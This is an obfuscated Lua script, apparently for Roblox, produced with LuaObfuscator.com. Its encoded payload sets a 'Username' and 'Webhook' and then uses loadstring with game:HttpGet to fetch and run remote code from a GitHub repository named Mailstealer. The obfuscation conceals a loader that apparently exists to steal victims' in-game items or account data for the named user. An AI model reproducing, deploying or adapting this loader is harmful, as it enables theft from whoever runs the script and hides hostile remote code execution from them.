--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v85,v19);v19=nil;v100=1;end end else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=0 -0 ;local v87;while true do if (v86==(0 -0)) then v87=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-((1497 -(282 + 595)) -(555 + 64))) -(v32-1)) + (932 -((2494 -(1523 + 114)) + 74)))) ;return v87-(v87%(569 -(330 + 37 + 201))) ;end end else local v88=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v88 + v88))>=v88) and 1) or (0 + 0) ;end end local function v21()local v34=0;local v35;while true do if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -(226 + 1044) ;end if (v34==(4 -(120 -(32 + 85)))) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;return (v41 * (31011612 -14234396)) + (v40 * ((120662 -(87 + 263)) -54776)) + (v39 * (436 -(67 + 113))) + v38 ;end local function v24()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(2 + 1)) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=953 -(802 + 150) ;v45=0 -0 ;end elseif (v47==(3712 -1665)) then return ((v46==(0 + 0)) and (v48 * (1/(997 -(915 + 82))))) or (v48 * NaN) ;end return v8(v48,v47-(2896 -(3359 -(998 + 488))) ) * (v45 + (v46/((1 + 1 + 0)^(68 -16)))) ;end if (v42==(1 + 0)) then v45=(1960 -(201 + 571)) -(1069 + 118) ;v46=(v20(v44,(3 -1) -1 ,20) * ((1140 -(116 + 1022))^32)) + v43 ;v42=3 -1 ;end if (v42==((439 -(145 + 293)) + (431 -(44 + 386)))) then v47=v20(v44,37 -16 ,31);v48=((v20(v44,32 + 0 )==(792 -(368 + 423))) and  -(3 -2)) or (19 -(10 + 8)) ;v42=11 -8 ;end if (v42==(442 -(416 + 26))) then v43=v23();v44=v23();v42=3 -2 ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v68=3 -2 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if ((5 -1)~=v52) then else v61=nil;while true do if ((1 -0)~=v53) then else local v97=0 -0 ;while true do if (v97==1) then v53=852 -(20 + 830) ;break;end if (v97==(285 -(134 + 151))) then v56=nil;v57=nil;v97=1666 -(970 + 695) ;end end end if (v53==(126 -(116 + 10))) then local v98=0 + 0 ;while true do if (v98~=(0 -0)) then else v54=1990 -(582 + 1408) ;v55=nil;v98=3 -2 ;end if (v98==1) then v53=1 + 0 ;break;end end end if (v53==(3 + 1)) then while true do if (v54==(3 -0)) then v61=nil;while true do local v104=0;local v105;while true do if (v104==(0 -0)) then v105=1824 -(1195 + 629) ;while true do if (v105==(0 -0)) then if ((407 -(118 + 287))~=v55) then else local v159=0;local v160;while true do if (v159==(0 -0)) then v160=0;while true do local v165=241 -(187 + 54) ;while true do if (v165~=(1121 -(118 + 1003))) then else if (v160~=1) then else return v59;end if (v160~=(780 -(162 + 618))) then else for v169=1 + 0 ,v23() do local v170=0 + 0 ;local v171;local v172;while true do if (v170==(1 -0)) then while true do if (v171~=0) then else v172=v21();if (v20(v172,4 -3 ,1)==(0 -0)) then local v183=0 + 0 ;local v184;local v185;local v186;while true do if (v183==(1638 -(1373 + 263))) then local v187=1000 -(451 + 549) ;while true do if ((0 -0)~=v187) then else if (v20(v185,1,1 + 0 )~=(1 -0)) then else v186[2 + 0 ]=v61[v186[2]];end if (v20(v185,1 + 1 ,2 -0 )~=(1385 -(746 + 638))) then else v186[2 + 1 ]=v61[v186[3]];end v187=1 -0 ;end if (v187~=(2 -1)) then else v183=7 -4 ;break;end end end if ((341 -(218 + 123))~=v183) then else local v188=0 -0 ;while true do if (v188~=1) then else v183=1582 -(1535 + 46) ;break;end if (0==v188) then local v193=0 + 0 ;while true do if (v193~=(0 + 0)) then else v184=v20(v172,755 -(239 + 514) ,3);v185=v20(v172,2 + 2 ,1335 -(797 + 532) );v193=561 -(306 + 254) ;end if (v193==(1 + 0)) then v188=1 + 0 ;break;end end end end end if (v183~=3) then else if (v20(v185,6 -3 ,5 -2 )==(1468 -(899 + 568))) then v186[1206 -(373 + 829) ]=v61[v186[4]];end v56[v169]=v186;break;end if (v183==(1 + 0)) then local v190=0 -0 ;while true do if (v190~=(603 -(268 + 335))) then else local v194=0 -0 ;while true do if (v194~=(291 -(60 + 230))) then else v190=239 -(64 + 174) ;break;end if (v194==(572 -(426 + 146))) then v186={v22(),v22(),nil,nil};if (v184==(216 -(42 + 174))) then local v199=0 -0 ;local v200;while true do if (v199~=(0 + 0)) then else v200=0 + 0 ;while true do if (v200~=0) then else v186[1 + 2 ]=v22();v186[1028 -(706 + 318) ]=v22();break;end end break;end end elseif (v184==(1 + 0)) then v186[1254 -(721 + 530) ]=v23();elseif (v184==(1582 -(1183 + 397))) then v186[1274 -(945 + 326) ]=v23() -(2^16) ;elseif (v184~=(8 -5)) then else local v205=0 + 0 ;local v206;while true do if (v205~=(0 -0)) then else v206=0;while true do if (v206==(0 + 0)) then v186[703 -(271 + 429) ]=v23() -(2^(15 + 1)) ;v186[1504 -(1408 + 92) ]=v22();break;end end break;end end end v194=1;end end end if (v190==1) then v183=5 -3 ;break;end end end end end break;end end break;end if (v170==(1086 -(461 + 625))) then local v176=0;while true do if (v176==0) then v171=1288 -(993 + 295) ;v172=nil;v176=1;end if (v176~=(1934 -(565 + 1368))) then else v170=1;break;end end end end end for v173=1 + 0 ,v23() do v57[v173-1 ]=v28();end v160=1172 -(418 + 753) ;end break;end end end break;end end end if (1==v55) then local v161=0 + 0 ;local v162;while true do if (v161==(1661 -(1477 + 184))) then v162=0 + 0 ;while true do if (v162==(0 + 0)) then local v166=0 + 0 ;while true do if (v166~=(0 + 0)) then else v60=v23();v61={};v166=530 -(406 + 123) ;end if (v166==(1770 -(1749 + 20))) then v162=1 + 0 ;break;end end end if (v162~=(1323 -(1249 + 73))) then else local v167=0 + 0 ;local v168;while true do if ((1145 -(466 + 679))==v167) then v168=0;while true do if (v168~=(0 -0)) then else for v177=2 -1 ,v60 do local v178=0;local v179;local v180;while true do if (v178==(476 -(41 + 435))) then local v181=0;while true do if (v181~=0) then else v179=v21();v180=nil;v181=1901 -(106 + 1794) ;end if (v181~=1) then else v178=1002 -(938 + 63) ;break;end end end if ((1 + 0)==v178) then if (v179==1) then v180=v21()~=0 ;elseif (v179==(1 + 1)) then v180=v24();elseif (v179~=(1 + 2)) then else v180=v25();end v61[v177]=v180;break;end end end v59[1128 -(936 + 189) ]=v21();v168=1;end if (v168==(2 -1)) then v162=2;break;end end break;end end end if (2==v162) then v55=5 -3 ;break;end end break;end end end v105=115 -(4 + 110) ;end if (v105~=(585 -(57 + 527))) then else if (v55==(1427 -(41 + 1386))) then local v163=103 -(17 + 86) ;local v164;while true do if (v163~=(0 + 0)) then else v164=0 -0 ;while true do if (v164==(5 -3)) then v55=1;break;end if (v164~=(166 -(122 + 44))) then else v56={};v57={};v164=1;end if ((1 -0)==v164) then v58={};v59={v56,v57,nil,v58};v164=2 + 0 ;end end break;end end end break;end end break;end end end break;end if (v54~=0) then else local v102=0 + 0 ;while true do if (v102~=1) then else v54=1;break;end if (v102==0) then v55=0;v56=nil;v102=1 -0 ;end end end if (v54==(66 -(30 + 35))) then local v103=0 + 0 ;while true do if (v103==0) then v57=nil;v58=nil;v103=1258 -(1043 + 214) ;end if (v103~=(3 -2)) then else v54=2;break;end end end if (v54~=(1214 -(323 + 889))) then else v59=nil;v60=nil;v54=7 -4 ;end end break;end if (2~=v53) then else local v99=0;while true do if ((580 -(361 + 219))~=v99) then else v58=nil;v59=nil;v99=321 -(53 + 267) ;end if (v99~=(1 + 0)) then else v53=5 -2 ;break;end end end if (v53~=3) then else v60=nil;v61=nil;v53=4;end end break;end if ((2 -1)==v52) then v55=nil;v56=nil;v52=1 + 1 ;end if (v52~=(5 -2)) then else v59=nil;v60=nil;v52=10 -6 ;end if (v52~=(1227 -(322 + 905))) then else v53=413 -(15 + 398) ;v54=nil;v52=1;end if ((984 -(18 + 964))==v52) then v57=nil;v58=nil;v52=11 -8 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v90=0;while true do if (v90==0) then v82=v70[v74];v83=v82[1];v90=1;end if (1==v90) then if (v83<=5) then if (v83<=2) then if (v83<=0) then v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v74=v82[3];elseif (v83>1) then do return;end else v80[v82[2]]();end elseif (v83<=3) then local v110=v82[2];local v111=v80[v82[3]];v80[v110 + 1 ]=v111;v80[v110]=v111[v82[4]];elseif (v83==4) then local v116;local v117,v118;local v119;local v120;v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v120=v82[2];v119=v80[v82[3]];v80[v120 + 1 ]=v119;v80[v120]=v119[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v120=v82[2];v117,v118=v73(v80[v120](v13(v80,v120 + 1 ,v82[3])));v75=(v118 + v120) -1 ;v116=0;for v142=v120,v75 do v116=v116 + 1 ;v80[v142]=v117[v116];end v74=v74 + 1 ;v82=v70[v74];v120=v82[2];v80[v120]=v80[v120](v13(v80,v120 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];else v74=v82[3];end elseif (v83<=8) then if (v83<=6) then v80[v82[2]]=v82[3]~=0 ;elseif (v83>7) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=10) then if (v83>9) then v64[v82[3]]=v80[v82[2]];else v80[v82[2]]=v82[3];end elseif (v83==11) then local v135=v82[2];v80[v135]=v80[v135](v13(v80,v135 + 1 ,v75));else local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==0) then v138=v82[2];v139,v140=v73(v80[v138](v13(v80,v138 + 1 ,v82[3])));v137=1;end if (v137==1) then v75=(v140 + v138) -1 ;v141=0;v137=2;end if (v137==2) then for v156=v138,v75 do v141=v141 + 1 ;v80[v156]=v139[v141];end break;end end end v74=v74 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D6503133O005365616E4A6572656D69655F5072656D69756D03073O00576562682O6F6B035O00163O0012093O00013O0026073O000D000100020004053O000D00012O0006000100013O001204000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026073O0001000100010004053O00010001001209000100093O00122O000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00023O00017O00",v9(),...);
